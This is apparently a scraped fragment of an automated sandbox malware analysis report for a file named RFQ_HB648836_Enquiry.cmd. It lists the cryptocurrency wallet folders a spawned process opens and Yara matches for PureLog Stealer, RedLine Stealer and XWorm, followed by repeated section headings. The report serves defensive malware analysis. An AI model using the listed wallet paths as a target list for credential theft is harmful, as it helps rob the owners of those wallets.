Source: C:\Users\user\Links\icqplewR.pif	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	File opened: C:\Users\user\AppData\Roaming\Guarda\	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\	Jump to behavior

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: 20.2.icqplewR.pif.1ce90f08.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.icqplewR.pif.1e045570.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.icqplewR.pif.1ce90000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.icqplewR.pif.1cee0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.icqplewR.pif.1b19f4f8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.icqplewR.pif.1cd1eeae.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.icqplewR.pif.1cd1eeae.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.icqplewR.pif.1cee0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.icqplewR.pif.1e046478.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.icqplewR.pif.1ce90000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.icqplewR.pif.1e062d90.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.icqplewR.pif.1b19f4f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.icqplewR.pif.1e062d90.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.icqplewR.pif.1ce90f08.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.icqplewR.pif.1cd1fdb6.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.icqplewR.pif.1e046478.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.icqplewR.pif.1cd1fdb6.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.icqplewR.pif.1e045570.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000003.1351645830.000000001B19F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1225845544.00000000202BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1439549690.000000001E045000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1438467684.000000001CEE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1438171646.000000001CCDE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1438299753.000000001CE90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected XWorm

Source: Yara match	File source: 00000014.00000002.1438596503.000000001D0A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: icqplewR.pif PID: 8032, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: icqplewR.pif PID: 7444, type: MEMORYSTR

Windows Analysis Report
RFQ_HB648836_Enquiry.cmd

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Windows Analysis Report RFQ_HB648836_Enquiry.cmd

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Windows Analysis Report
RFQ_HB648836_Enquiry.cmd

Malware Threat Intel
Provided by